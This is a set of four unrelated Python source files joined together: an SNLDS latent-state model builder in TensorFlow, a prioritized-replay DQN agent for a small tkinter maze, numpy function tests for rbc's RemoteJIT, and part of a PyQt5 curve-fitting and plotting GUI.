sampled_z = tf.reshape(sampled_z,
[num_samples, batch_size, num_steps, latent_dim])
entropies = tf.reshape(entropies, [num_samples, batch_size, num_steps])
log_probs = tf.reshape(log_probs, [num_samples, batch_size, num_steps])
return sampled_z, entropies, log_probs
def create_model(num_categ,
hidden_dim,
observation_dim,
config_emission,
config_inference,
config_z_initial,
config_z_transition,
network_emission,
network_input_embedding,
network_posterior_rnn,
network_s_transition,
networks_z_transition,
network_posterior_mlp=lambda x: x,
name="snlds"):
"""Construct SNLDS model.
Args:
num_categ: an `int` scalar for number of discrete states, `s`.
hidden_dim: an `int` scalar for dimension of continuous hidden states, `z`.
observation_dim: an `int` scalar for dimension of observations, `x`.
config_emission: a `dict` for configuring emission distribution,
`p(x[t] | z[t])`.
config_inference: a `dict` for configuring the posterior distribution,
`q(z[t]|h[t]=f_RNN(h[t-1], z[t-1], h[t]^b))`.
config_z_initial: a `dict` for configuring the initial distribution of
continuous hidden state, `p(z[0])`.
config_z_transition: a `dict` for configuring the transition distribution
`p(z[t] | z[t-1], s[t])`.
network_emission: a `callable` network taking continuous hidden
states, `z[t]`, and returning the mean of emission distribution,
`p(x[t] | z[t])`.
network_input_embedding: a `callable` network to embed the observations,
`x[t]`. E.g. a bidirectional RNN to embed `x[1:T]`.
network_posterior_rnn: a RNN cell, `h[t]=f_RNN(h[t-1], z[t-1], input[t])`,
which recursively takes previous step RNN states `h`, previous step
sampled dynamical state `z[t-1]`, and conditioned input `input[t]`.
network_s_transition: a `callable` network taking batch conditional inputs,
`x[t-1]`, and returning the discrete state transition matrices,
`log p(s[t] |s[t-1], x[t-1])`.
networks_z_transition: a list of `callable` networks, with the length
of list same as `num_categories`. Each one of the networks will take
previous step hidden state, `z[t-1]`, and returns the mean of
transition distribution, `p(z[t] | z[t-1], s[t]=i)` for each
discrete state `i`.
network_posterior_mlp: an optional network to embed the output of the
inference RNN, before passing it into the distribution as the mean,
`q(z[t] | mlp( h[t] ))`. Default to identity mapping.
name: a `str` to construct names of variables.
Returns:
An instance of instantiated `model_base.SwitchingNLDS` model.
"""
z_transition = ContinuousStateTransition(
transition_mean_networks=networks_z_transition,
distribution_dim=hidden_dim,
num_categories=num_categ,
cov_mat=config_z_transition.cov_mat,
use_triangular_cov=config_z_transition.use_triangular_cov,
use_trainable_cov=config_z_transition.use_trainable_cov,
raw_sigma_bias=config_z_transition.raw_sigma_bias,
sigma_min=config_z_transition.sigma_min,
sigma_scale=config_z_transition.sigma_scale,
name=name+"_z_trans")
s_transition = DiscreteStateTransition(
transition_network=network_s_transition,
num_categories=num_categ)
emission_network = GaussianDistributionFromMean(
emission_mean_network=network_emission,
observation_dim=observation_dim,
cov_mat=config_emission.cov_mat,
use_triangular_cov=config_emission.use_triangular_cov,
use_trainable_cov=config_emission.use_trainable_cov,
raw_sigma_bias=config_emission.raw_sigma_bias,
sigma_min=config_emission.sigma_min,
sigma_scale=config_emission.sigma_scale,
name=name+"_x_emit")
posterior_distribution = GaussianDistributionFromMean(
emission_mean_network=network_posterior_mlp,
observation_dim=hidden_dim,
cov_mat=config_inference.cov_mat,
use_triangular_cov=config_inference.use_triangular_cov,
use_trainable_cov=config_inference.use_trainable_cov,
raw_sigma_bias=config_inference.raw_sigma_bias,
sigma_min=config_inference.sigma_min,
sigma_scale=config_inference.sigma_scale,
name=name+"_posterior")
posterior_network = RnnInferenceNetwork(
posterior_rnn=network_posterior_rnn,
posterior_dist=posterior_distribution,
latent_dim=hidden_dim,
embedding_network=network_input_embedding)
z_initial_distribution = construct_initial_state_distribution(
latent_dim=hidden_dim,
num_categ=num_categ,
use_trainable_cov=config_z_initial.use_trainable_cov,
use_triangular_cov=config_z_initial.use_triangular_cov,
raw_sigma_bias=config_z_initial.raw_sigma_bias,
sigma_min=config_z_initial.sigma_min,
sigma_scale=config_z_initial.sigma_scale,
name="init_dist")
snlds_model = model_base.SwitchingNLDS(
continuous_transition_network=z_transition,
discrete_transition_network=s_transition,
emission_network=emission_network,
inference_network=posterior_network,
initial_distribution=z_initial_distribution,
continuous_state_dim=None,
num_categories=None,
discrete_state_prior=None)
return snlds_model
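# A hedged sketch of wiring `create_model` (all values, the toy Keras layers
# and the use of plain namedtuples for the config objects are assumptions for
# illustration only; the configs just need the attributes read above):
#
#   DistConfig = collections.namedtuple(
#       "DistConfig", ["cov_mat", "use_triangular_cov", "use_trainable_cov",
#                      "raw_sigma_bias", "sigma_min", "sigma_scale"])
#   cfg = DistConfig(cov_mat=None, use_triangular_cov=True,
#                    use_trainable_cov=True, raw_sigma_bias=0.0,
#                    sigma_min=1e-5, sigma_scale=0.05)
#   model = create_model(
#       num_categ=3, hidden_dim=4, observation_dim=2,
#       config_emission=cfg, config_inference=cfg,
#       config_z_initial=cfg, config_z_transition=cfg,
#       network_emission=layers.Dense(2),
#       network_input_embedding=lambda x: x,
#       network_posterior_rnn=layers.GRUCell(4),
#       network_s_transition=layers.Dense(3 * 3),
#       networks_z_transition=[layers.Dense(4) for _ in range(3)])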
|
<reponame>GodWriter/RL-Pytorch
import math
import time
import argparse
import numpy as np
import tkinter as tk
import torch
import torch.nn as nn
from tensorboardX import SummaryWriter
seed = 1
torch.manual_seed(seed)
UNIT = 40 # pixel size of one grid cell
MAZE_H = 4 # maze height (in cells)
MAZE_W = 4 # maze width (in cells)
class Maze(tk.Tk, object):
def __init__(self):
super(Maze, self).__init__()
self.action_space = ['u', 'd', 'l', 'r']
self.n_actions = len(self.action_space)
self.title('maze')
self.geometry('{0}x{1}'.format(MAZE_H * UNIT, MAZE_H * UNIT))
self._build_maze()
def _build_maze(self):
self.canvas = tk.Canvas(self, bg='white',
height=MAZE_H * UNIT,
width=MAZE_W * UNIT)
# create the grid lines
for c in range(0, MAZE_W * UNIT, UNIT):
x0, y0, x1, y1 = c, 0, c, MAZE_H * UNIT
self.canvas.create_line(x0, y0, x1, y1)
for r in range(0, MAZE_H * UNIT, UNIT):
x0, y0, x1, y1 = 0, r, MAZE_W * UNIT, r
self.canvas.create_line(x0, y0, x1, y1)
# create the origin
origin = np.array([20, 20])
# hell1
hell1_center = origin + np.array([UNIT * 2, UNIT])
self.hell1 = self.canvas.create_rectangle(hell1_center[0] - 15,
hell1_center[1] - 15,
hell1_center[0] + 15,
hell1_center[1] + 15,
fill='black')
# hell2
hell2_center = origin + np.array([UNIT, UNIT * 2])
self.hell2 = self.canvas.create_rectangle(hell2_center[0] - 15,
hell2_center[1] - 15,
hell2_center[0] + 15,
hell2_center[1] + 15,
fill='black')
# create oval
oval_center = origin + UNIT * 2
self.oval = self.canvas.create_oval(oval_center[0] - 15,
oval_center[1] - 15,
oval_center[0] + 15,
oval_center[1] + 15,
fill='yellow')
# create red rect
self.rect = self.canvas.create_rectangle(origin[0] - 15,
origin[1] - 15,
origin[0] + 15,
origin[1] + 15,
fill='red')
# pack all
self.canvas.pack()
def reset(self):
self.update()
time.sleep(0.5)
self.canvas.delete(self.rect)
origin = np.array([20, 20])
self.rect = self.canvas.create_rectangle(origin[0] - 15,
origin[1] - 15,
origin[0] + 15,
origin[1] + 15,
fill='red')
return self.canvas.coords(self.rect)
def step(self, action):
s = self.canvas.coords(self.rect) # coordinates of the agent rectangle; the position checks below compare against these
base_action = np.array([0, 0])
if action == 0: # up
if s[1] > UNIT:
base_action[1] -= UNIT
elif action == 1: # down
if s[1] < (MAZE_H - 1) * UNIT:
base_action[1] += UNIT
elif action == 2: # right
if s[0] < (MAZE_W - 1) * UNIT:
base_action[0] += UNIT
elif action == 3: # left
if s[0] > UNIT:
base_action[0] -= UNIT
self.canvas.move(self.rect, base_action[0], base_action[1]) # move the agent
s_ = self.canvas.coords(self.rect) # get the next state
# reward function
if s_ == self.canvas.coords(self.oval): # reached the exit
reward = 1
done = True
elif s_ in [self.canvas.coords(self.hell1), self.canvas.coords(self.hell2)]: # stepped into a trap
reward = -1
done = True
else: # any other cell
reward = 0
done = False
return s_, reward, done
def render(self):
time.sleep(0.1)
self.update()
# Environment Config
env = Maze()
num_state = 4
num_action = env.n_actions
# CUDA
device = 'cpu' if not torch.cuda.is_available() else 'cuda:0'
device = torch.device(device)
class NaivePrioritizedBuffer(object):
def __init__(self, capacity, prob_alpha=0.6):
self.capacity = capacity
self.prob_alpha = prob_alpha
self.pos = 0
self.buffer = []
self.priorities = np.zeros((capacity,), dtype=np.float32)
def push(self, state, action, reward, next_state, done):
assert len(state) == len(next_state)
state = np.expand_dims(state, 0)
next_state = np.expand_dims(next_state, 0)
max_prio = self.priorities.max() if self.buffer else 1.0 # initial priorities are all equal; any constant (1, 2, 3, ...) works as long as they match
if len(self.buffer) < self.capacity:
self.buffer.append((state, action, reward, next_state, done))
else:
self.buffer[self.pos] = (state, action, reward, next_state, done)
self.priorities[self.pos] = max_prio # give new samples the current maximum priority so every sample is replayed at least once
self.pos = (self.pos + 1) % self.capacity
def sample(self, batch_size, beta=0.4):
if len(self.buffer) == self.capacity:
prios = self.priorities
else:
prios = self.priorities[:self.pos]
# sample indices according to the priority distribution
probs = prios ** self.prob_alpha
probs /= probs.sum()
indices = np.random.choice(len(self.buffer), batch_size, p=probs)
samples = [self.buffer[idx] for idx in indices]
# compute the importance-sampling weights of the sampled transitions
total = len(self.buffer)
weights = (total * probs[indices]) ** (-beta)
weights /= weights.max()
weights = np.array(weights, dtype=np.float32)
batch = list(zip(*samples)) # zip objects are not subscriptable in Python 3
states = np.concatenate(batch[0])
actions = batch[1]
rewards = batch[2]
next_states = np.concatenate(batch[3])
dones = batch[4]
return states, actions, rewards, next_states, dones, indices, weights
def update_priorities(self, batch_indices, batch_priorities):
for idx, prio in zip(batch_indices, batch_priorities):
self.priorities[idx] = prio # transitions with larger TD error get a higher sampling probability
def __len__(self):
return len(self.buffer)
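# A small usage sketch of the buffer (shapes and constants are illustrative
# assumptions, not values from the training loop below):
#
#   buf = NaivePrioritizedBuffer(capacity=1000)
#   buf.push(np.zeros(4), 0, 0.0, np.zeros(4), False)
#   # once enough transitions have been pushed:
#   #   states, actions, rewards, next_states, dones, idx, w = buf.sample(32, beta=0.4)
#   #   buf.update_priorities(idx, new_td_errors)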
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.layers = nn.Sequential(nn.Linear(num_state, 128),
nn.ReLU(),
nn.Linear(128, 128),
nn.ReLU(),
nn.Linear(128, num_action))
def forward(self, x):
return self.layers(x)
class PrioritizedDQN():
def __init__(self, args):
super(PrioritizedDQN, self).__init__()
self.args = args
self.target_net = Net().to(device)
self.eval_net = Net().to(device)
self.memory_count = 0
self.update_count = 0
self.replay_buffer = NaivePrioritizedBuffer(self.args.capacity)
self.writer = SummaryWriter(self.args.logs)
self.optimizer = torch.optim.Adam(self.eval_net.parameters(), self.args.learning_rate)
def choose_action(self, state, epsilon):
if np.random.rand(1) > epsilon:
state = torch.tensor(state, dtype=torch.float).unsqueeze(0).to(device)
value = self.eval_net(state)
_, idx = torch.max(value, 1)
action = idx.item()
else:
action = np.random.choice(range(num_action), 1).item()
return action
def learn(self, beta):
if len(self.replay_buffer) >= self.args.batch_size: # learn only once enough transitions have been collected
state, action, reward, next_state, done, indices, weights = self.replay_buffer.sample(self.args.batch_size, beta)
state = torch.FloatTensor(np.float32(state)).to(device)
next_state = torch.FloatTensor(np.float32(next_state)).to(device)
action = torch.LongTensor(action).to(device)
reward = torch.FloatTensor(reward).to(device)
done = torch.FloatTensor(done).to(device)
weights = torch.FloatTensor(weights).to(device)
eval_v = self.eval_net(state)
next_eval_v = self.eval_net(next_state)
target_v = self.target_net(next_state)
q_v = eval_v.gather(1, action.unsqueeze(1)).squeeze(1)
next_q_v = target_v.gather(1, torch.max(next_eval_v, 1)[1].unsqueeze(1)).squeeze(1)
expected_q_v = reward + self.args.gamma * next_q_v * (1 - done)
loss = (q_v - expected_q_v.detach()).pow(2) * weights
prios = loss + 1e-5
loss = loss.mean()
self.replay_buffer.update_priorities(indices, prios.detach().cpu().numpy()) # the TD errors are used to update the sample priorities
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
self.writer.add_scalar('loss/value_loss', loss, self.update_count)
self.update_count += 1
if self.update_count % 100 == 0:
self.target_net.load_state_dict(self.eval_net.state_dict())
def epsilon_by_frame(frame_idx):
epsilon_start = 1.0
epsilon_final = 0.01
epsilon_decay = 500
return epsilon_final + (epsilon_start - epsilon_final) * math.exp(-1. * frame_idx / epsilon_decay)
def beta_by_frame(frame_idx):
beta_start = 0.4
beta_frames = 1000
return min(1.0, beta_start + frame_idx * (1.0 - beta_start) / beta_frames)
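# Rough shape of the two schedules (values follow from the formulas above):
#   epsilon_by_frame(0) = 1.0, epsilon_by_frame(500) ~= 0.37, decaying towards 0.01
#   beta_by_frame(0) = 0.4, beta_by_frame(1000) = 1.0 (capped at 1.0 afterwards)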
def reward_func(env, x, theta):
r1 = (env.x_threshold - abs(x)) / env.x_threshold - 0.5
r2 = (env.theta_threshold_radians - abs(theta)) / env.theta_threshold_radians - 0.5
return r1 + r2 # a custom reward is needed; the one provided by gym keeps the model from converging
def main(args):
agent = PrioritizedDQN(args)
ep_reward = 0.0
state = env.reset()
if args.render: env.render()
for f_idx in range(args.n_frames):
# choose action and get next_state
epsilon = epsilon_by_frame(f_idx)
action = agent.choose_action(state, epsilon)
next_state, reward, done = env.step(action)
# update the replay buffer.
if args.render: env.render()
agent.replay_buffer.push(state, action, reward, next_state, done)
state = next_state
ep_reward += reward
if len(agent.replay_buffer) > args.batch_size:
beta = beta_by_frame(f_idx)
agent.learn(beta)
if f_idx % 200 == 0:
print("Frame is {}, the episode reward is {}".format(f_idx, round(ep_reward, 3)))
if done:
state = env.reset()
ep_reward = 0.0
print("Training is Done!!!")
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=32)
parser.add_argument('--n_frames', type=int, default=1000000)
parser.add_argument('--capacity', type=int, default=8000)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--learning_rate', type=float, default=1e-3)
parser.add_argument('--render', type=bool, default=True)
parser.add_argument('--logs', type=str, default='logs/Prioritized_DQN_CartPole_V0')
args = parser.parse_args()
print(args)
main(args)
|
<reponame>tupui/rbc
import atexit
import pytest
from rbc.remotejit import RemoteJIT
import numpy as np
@pytest.fixture(scope="module")
def rjit(request):
rjit = RemoteJIT()
rjit.start_server(background=True)
request.addfinalizer(rjit.stop_server)
atexit.register(rjit.stop_server)
return rjit
def test_trunc(rjit):
@rjit('double(double)')
def trunc(x):
return np.trunc(x)
assert (np.allclose(trunc(0.3), np.trunc(0.3)))
assert (np.allclose(trunc(2.9), np.trunc(2.9)))
def test_exp2(rjit):
@rjit('double(double)')
def exp2(x):
return np.exp2(x)
assert (np.isclose(exp2(2), np.exp2(2)))
assert (np.isclose(exp2(3), np.exp2(3)))
def test_exp2f(rjit):
@rjit('float(float)')
def exp2(x):
return np.exp2(x)
assert (np.isclose(exp2(2.0), np.exp2(2.0)))
def test_logaddexp(rjit):
# ref:
# https://github.com/numpy/numpy/blob/2fd9ff8277ad25aa386c3432b6ebc35322879d91/numpy/core/tests/test_umath.py#L818-L860
@rjit('double(double, double)')
def logaddexp(x, y):
return np.logaddexp(x, y)
def test_values():
x = [1, 2, 3, 4, 5]
y = [5, 4, 3, 2, 1]
z = [6, 6, 6, 6, 6]
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
logxf = np.log(np.array(_x, dtype=dt))
logyf = np.log(np.array(_y, dtype=dt))
logzf = np.log(np.array(_z, dtype=dt))
assert(np.allclose(logaddexp(logxf, logyf), logzf))
def test_range():
x = [1000000, -1000000, 1000200, -1000200]
y = [1000200, -1000200, 1000000, -1000000]
z = [1000200, -1000000, 1000200, -1000000]
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
# [()] ~> quick hack! rbc doesn't support passing arrays
xf = np.array(_x, dtype=dt)[()]
yf = np.array(_y, dtype=dt)[()]
zf = np.array(_z, dtype=dt)[()]
assert(np.allclose(logaddexp(xf, yf), zf))
def test_inf():
# logaddexp inf
inf = np.inf
x = [inf, -inf, inf, -inf, inf, 1, -inf, 1]
y = [inf, inf, -inf, -inf, 1, inf, 1, -inf]
z = [inf, inf, inf, -inf, inf, inf, 1, 1]
with np.errstate(invalid='raise'):
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
# [()] ~> quick hack! rbc doesn't support passing arrays
xf = np.array(_x, dtype=dt)[()]
yf = np.array(_y, dtype=dt)[()]
zf = np.array(_z, dtype=dt)[()]
assert(np.allclose(logaddexp(xf, yf), zf))
def test_nan():
assert(np.isnan(logaddexp(np.nan, np.inf)))
assert(np.isnan(logaddexp(np.inf, np.nan)))
assert(np.isnan(logaddexp(np.nan, 0)))
assert(np.isnan(logaddexp(0, np.nan)))
assert(np.isnan(logaddexp(np.nan, np.nan)))
test_values()
test_range()
test_inf()
test_nan()
def test_logaddexp2(rjit):
# ref:
# https://github.com/numpy/numpy/blob/2fd9ff8277ad25aa386c3432b6ebc35322879d91/numpy/core/tests/test_umath.py#L580-L619
@rjit('double(double, double)')
def logaddexp2(x, y):
return np.logaddexp2(x, y)
def test_values():
x = [1, 2, 3, 4, 5]
y = [5, 4, 3, 2, 1]
z = [6, 6, 6, 6, 6]
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
logxf = np.log2(np.array(_x, dtype=dt))
logyf = np.log2(np.array(_y, dtype=dt))
logzf = np.log2(np.array(_z, dtype=dt))
assert(np.allclose(logaddexp2(logxf, logyf), logzf))
def test_range():
x = [1000000, -1000000, 1000200, -1000200]
y = [1000200, -1000200, 1000000, -1000000]
z = [1000200, -1000000, 1000200, -1000000]
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
# [()] ~> quick hack! rbc doesn't support passing arrays
xf = np.array(_x, dtype=dt)[()]
yf = np.array(_y, dtype=dt)[()]
zf = np.array(_z, dtype=dt)[()]
assert(np.allclose(logaddexp2(xf, yf), zf))
def test_inf():
# logaddexp2 inf
inf = np.inf
x = [inf, -inf, inf, -inf, inf, 1, -inf, 1]
y = [inf, inf, -inf, -inf, 1, inf, 1, -inf]
z = [inf, inf, inf, -inf, inf, inf, 1, 1]
with np.errstate(invalid='raise'):
for _x, _y, _z in zip(x, y, z):
for dt in ['f', 'd', 'g']:
# [()] ~> quick hack! rbc doesn't support passing arrays
xf = np.array(_x, dtype=dt)[()]
yf = np.array(_y, dtype=dt)[()]
zf = np.array(_z, dtype=dt)[()]
assert(np.allclose(logaddexp2(xf, yf), zf))
def test_nan():
assert(np.isnan(logaddexp2(np.nan, np.inf)))
assert(np.isnan(logaddexp2(np.inf, np.nan)))
assert(np.isnan(logaddexp2(np.nan, 0)))
assert(np.isnan(logaddexp2(0, np.nan)))
assert(np.isnan(logaddexp2(np.nan, np.nan)))
test_values()
test_range()
test_inf()
test_nan()
def test_signbit(rjit):
@rjit('bool(double)')
def signbit(x):
return np.signbit(x)
def check(array):
for val in array:
out = signbit(val)
expected = np.signbit(val)
assert out == expected, val
a = np.arange(-10, 10, dtype=np.float32)
check(a)
b = np.array([-2, 5, 1, 4, 3], dtype=np.float16)
check(b)
c = np.array([-0.0, 0.0, np.inf, -np.inf], dtype=np.float32)
check(c)
|
import os
from PyQt5 import QtCore, QtWidgets
from .ui.MainWindow import Ui_MainWindow
from .ui.about import Ui_Form as Ui_aboutWindow
from .ui.input import Ui_Form as Ui_inputWindow
from .ui.help import Ui_Form as Ui_helpWindow
import pyqtgraph as pg
import pyqtgraph.exporters
import matplotlib.pyplot as plt
from .fit import *
import configparser
import sys
import matplotlib
matplotlib.use('Qt5Agg')
from PyQt5 import QtCore, QtGui, QtWidgets
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg, NavigationToolbar2QT as NavigationToolbar
from matplotlib.figure import Figure
try:
plt.rcParams.update({
"text.usetex": True,
"font.family": "DejaVu Sans",
"font.serif": ["Palatino"],
})
except Exception:
print('Could not Latex-ify labels')
class MplCanvas(FigureCanvasQTAgg):
def __init__(self, parent=None, width=5, height=4, dpi=300, show_residuals=True):
fig = Figure(figsize=(width, height), dpi=dpi, tight_layout=True)
if show_residuals:
self.axes = fig.add_subplot(211)
self.residuals = fig.add_subplot(212, sharex = self.axes)
else:
self.axes = fig.add_subplot(111)
super(MplCanvas, self).__init__(fig)
language_path = os.path.realpath(__file__)[:-6] + "language" + os.sep
class Mainwindow(QtWidgets.QMainWindow, Ui_MainWindow):
def __init__(self, parent=None, rawVariables=None):
super(Mainwindow, self).__init__(parent)
self.setupUi(self)
self.show()
self.show_residuals = True
# set up the plotting canvas
self.Xlabel = None
self.Ylabel = None
self.sc = MplCanvas(self, width=5, height=4, dpi=100, show_residuals=self.show_residuals)
self.sc.axes.grid(True)
self.toolbar = NavigationToolbar(self.sc, self)
self.gridLayout_3.addWidget(self.sc)
self.gridLayout_3.addWidget(self.toolbar)
# set up the help, about and input windows, and connect the signals
self.rawVariables = rawVariables
self.showvars()
self.aboutwindow = Aboutwindow()
self.helpwindow = Helpwindow()
self.inputwindow_title = Inputwindow()
self.inputwindow_title.pushButton.clicked.connect(self.inputtitleback)
self.inputwindow_xlabel = Inputwindow()
self.inputwindow_xlabel.pushButton.clicked.connect(self.inputXlabelback)
self.inputwindow_ylabel = Inputwindow()
self.inputwindow_ylabel.pushButton.clicked.connect(self.inputYlabelback)
self.signalchannels()
# set up the fit-option comboBox
self.comboBox_3.setCurrentIndex(4)
self.stackedWidget.setCurrentIndex(4)
self.findcombo = {'0': [self.lineEdit_2, self.lineEdit_3, self.textEdit_2], '1': self.comboBox_5,
'2': self.comboBox_6, '3': self.comboBox_7, '4': self.comboBox_4, '5': self.comboBox_8,
'6': [self.comboBox_9, self.comboBox_10], '7': self.comboBox_11}
self.findlabel = {'1': self.label_11, '2': self.label_13, '3': self.label_15, '5': self.label_19,
'6': self.label_22, '7': self.label_26}
# set up translation
self.translator = QtCore.QTranslator()
config = configparser.ConfigParser()
config.read(os.path.expanduser('~') + os.sep + 'curvefitting.ini')
self.language = config['DEFAULT'].get('language', "en")
if self.language == 'en':
self.translate("en", nomatter=True)
else:
self.action_English.setIconVisibleInMenu(False)
# autofit settings
if config['DEFAULT'].get('autofit', "False") == "False":
self.autofit = False
self.action_12.setIconVisibleInMenu(False)
else:
self.autofit = True
self.checkBox.setChecked(True)
def signalchannels(self):
# wire up the signal-slot connections
self.comboBox.currentIndexChanged.connect(self.plot)
self.comboBox.currentIndexChanged.connect(self.renew_xylabel)
self.comboBox_2.currentIndexChanged.connect(self.plot)
self.comboBox_2.currentIndexChanged.connect(self.renew_xylabel)
self.pushButton.clicked.connect(self.goodfit)
self.checkBox.stateChanged.connect(self.setCheckBox)
self.pushButton_2.setDisabled(True)
self.pushButton_4.clicked.connect(self.printfigure)
self.action_3.triggered.connect(self.printfigure)
self.pushButton_5.clicked.connect(self.savefigure)
self.action_7.triggered.connect(self.savefigure)
self.action_5.triggered.connect(self.close)
self.action_Chinese.triggered.connect(lambda: self.translate("zh_CN"))
self.action_English.triggered.connect(lambda: self.translate("en"))
self.action_11.triggered.connect(self.aboutwindow.show)
self.action_10.triggered.connect(self.helpwindow.show)
self.action_12.triggered.connect(self.action_autofit)
self.action_8.triggered.connect(self.inputtitle)
self.actionX.triggered.connect(self.inputXlabel)
self.actionY.triggered.connect(self.inputYlabel)
self.action.triggered.connect(self.clear)
self.pushButton_2.clicked.connect(self.stopfitting)
self.comboBox_3.currentIndexChanged.connect(self.showfitoption)
self.comboBox_5.currentIndexChanged.connect(self.showfunction)
self.comboBox_6.currentIndexChanged.connect(self.showfunction)
self.comboBox_7.currentIndexChanged.connect(self.showfunction)
self.comboBox_8.currentIndexChanged.connect(self.showfunction)
self.comboBox_9.currentIndexChanged.connect(self.showfunction)
self.comboBox_10.currentIndexChanged.connect(self.showfunction)
self.comboBox_11.currentIndexChanged.connect(self.showfunction)
self.pushButton_3.clicked.connect(self.printresult)
self.action_2.triggered.connect(self.printresult)
def translate(self, language, nomatter=False):
if (self.language != language) or nomatter:
self.translator.load(language_path + "MainWindow_{}.qm".format(language))
_app = QtWidgets.QApplication.instance()
_app.installTranslator(self.translator)
self.retranslateUi(self)
self.aboutwindow.translate(language)
self.helpwindow.translate(language)
self.inputwindow_title.translate(language)
self.inputwindow_xlabel.translate(language)
self.inputwindow_ylabel.translate(language)
self.language = language
if language == "en":
self.action_English.setIconVisibleInMenu(True)
self.action_Chinese.setIconVisibleInMenu(False)
elif language == "zh_CN":
self.action_English.setIconVisibleInMenu(False)
self.action_Chinese.setIconVisibleInMenu(True)
def showvars(self):
# filter suitable variables and show them in the comboBoxes
keys_ = list(self.rawVariables.keys())
variables = []
for i_ in keys_:
if not i_.startswith('_') and str(type(self.rawVariables[i_]))[8:-2] in ['int', 'float', 'list', 'tuple',
'numpy.ndarray'] \
and not i_ in ['In', 'variables']:
variables.append(i_)
del i_, keys_
text1 = self.comboBox.currentText()
text2 = self.comboBox_2.currentText()
self.comboBox.clear()
self.comboBox_2.clear()
self.comboBox.addItems(variables)
self.comboBox_2.addItems(variables)
self.comboBox.setCurrentText(text1)
self.comboBox_2.setCurrentText(text2)
def plot(self):
# draw the scatter plot
text1 = self.comboBox.currentText()
text2 = self.comboBox_2.currentText()
try:
x, y = eval(text1, self.rawVariables), eval(text2, self.rawVariables)
if type(x) != type(y):
self.messege(
"无法绘制!\nX与Y的数据类型不同" if self.language == "zh_CN" else "Cannot plot!\nX and Y have different data types")
elif len(x) != len(y):
self.messege(
"无法绘制!\nX与Y的维度不同" if self.language == "zh_CN" else "Cannot plot!\nX and Y have different dimensions")
else:
self.full_x = x
self.full_y = y
self.sc.axes.clear()
self.sc.axes.scatter(x, y, s=5, c='k', label='Raw data', picker=True, pickradius=1)
self.outliers = np.zeros(x.shape).astype(bool)
self.sc.mpl_connect('pick_event', self.outlier_pick)
self.sc.draw()
if self.autofit:
self.goodfit()
except Exception as e:
self.messege(repr(e))
def messege(self, e):
msg_box = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Warning, 'Warning', e)
msg_box.exec_()
def setCheckBox(self):
# settings applied when the checkBox state changes
combos = (self.comboBox_3, self.comboBox_4, self.comboBox_5, self.comboBox_6, self.comboBox_7,
self.comboBox_8, self.comboBox_9, self.comboBox_10, self.comboBox_11)
if self.checkBox.isChecked():
self.autofit = True
self.plot()
self.pushButton.setDisabled(True)
self.pushButton_2.setDisabled(True)
for combo in combos:
combo.currentIndexChanged.connect(self.plot)
self.action_12.setIconVisibleInMenu(True)
else:
self.autofit = False
self.pushButton.setDisabled(False)
for combo in combos:
combo.currentIndexChanged.disconnect(self.plot)
self.action_12.setIconVisibleInMenu(False)
def findfitmod(self):
# build the input parameters for fit
index = self.comboBox_3.currentIndex()
if index == 0:
edits = self.findcombo['0']
value = [edits[0].text(), edits[1].text(), edits[2].toPlainText()]
elif index == 6:
value = [i.currentIndex() for i in self.findcombo['6']]
elif index == 8:
value = 0
else:
value = self.findcombo[str(index)].currentIndex()
self.fitmod = (index, value)
def goodfit(self, outliers=None):
# entry point for fitting
if not self.autofit:
self.pushButton.setDisabled(True)
self.plot()
self.pushButton_2.setDisabled(False)
self.text1 = self.comboBox.currentText()
self.text2 = self.comboBox_2.currentText()
try:
self.findfitmod()
self.x, self.y = eval(self.text1, self.rawVariables), eval(self.text2, self.rawVariables)
if outliers is not None:
self.x = self.x[np.logical_not(outliers)]
self.y = self.y[np.logical_not(outliers)]
# start the worker thread
self.workthread = WorkThread([self])
self.workthread.trigger.connect(self.goodfitback)
self.workthread.start()
except Exception as e:
self.messege(repr(e))
def goodfitback(self):
# the fit runs in a worker thread; this slot restores the button states once it finishes
if self.successfit:
try:
self.textEdit.setText("")
text = give_reflect(self.x, self.y, self.p, self.para, self.para_names, self.fitmod, self.language)
for i in text:
self.textEdit.append(i)
except Exception as e:
self.messege(repr(e))
else:
self.messege(self.e)
self.update_figure()
if not self.autofit:
self.pushButton.setDisabled(False)
self.pushButton_2.setDisabled(True)
def update_figure(self):
xx = (self.x.min(), self.x.max())
self.sc.axes.clear()
self.sc.axes.grid(True)
self.sc.axes.scatter(self.full_x, self.full_y, s=5, c='k', label='Raw data', picker=True, pickradius=2)
if np.sum(self.outliers) > 0:
self.sc.axes.scatter(self.full_x[self.outliers], self.full_y[self.outliers], s=50, marker='x', c='r', label='Outliers')
self.sc.axes.plot(np.linspace(xx[0], xx[1], 200), self.p(np.linspace(xx[0], xx[1], 200), *self.para), label='Fit')
self.sc.axes.set_xlabel(self.text1)
self.sc.axes.set_ylabel(self.text2)
self.sc.axes.legend()
if self.show_residuals:
self.sc.residuals.clear()
self.sc.residuals.set_title('Residuals')
self.sc.residuals.grid(True)
self.sc.residuals.plot(xx, [0,0], linestyle=':', label='Baseline')
deviations = self.y-self.p(self.x, *self.para)
self.sc.residuals.scatter(self.x, deviations, c='k', s=2, label='Residuals')
self.sc.residuals.set_xlabel(self.text1)
self.sc.residuals.set_ylabel(self.text2)
y_zeros = np.zeros(self.x.shape)
for x_0, y_0, y_dev in zip(self.x, y_zeros, deviations):
# print(y_dev)
try:
if y_dev > 0:
plot_color = 'g'
else:
plot_color = 'r'
self.sc.residuals.plot([x_0, x_0], [y_0, y_dev], c=plot_color)
except:
pass
self.sc.residuals.legend()
self.sc.setMinimumHeight(400)
self.sc.setMinimumWidth(400)
self.sc.mpl_connect('pick_event', self.outlier_pick)
self.sc.draw()
def outlier_pick(self, event):
ind = event.ind
point = tuple(zip(self.full_x[ind], self.full_y[ind]))
        self.outliers[ind] = np.logical_not(self.outliers[ind])
# print('onpick point:', point, self.outliers)
if self.autofit:
self.goodfit(outliers=self.outliers)
self.update_figure()
def stopfitting(self):
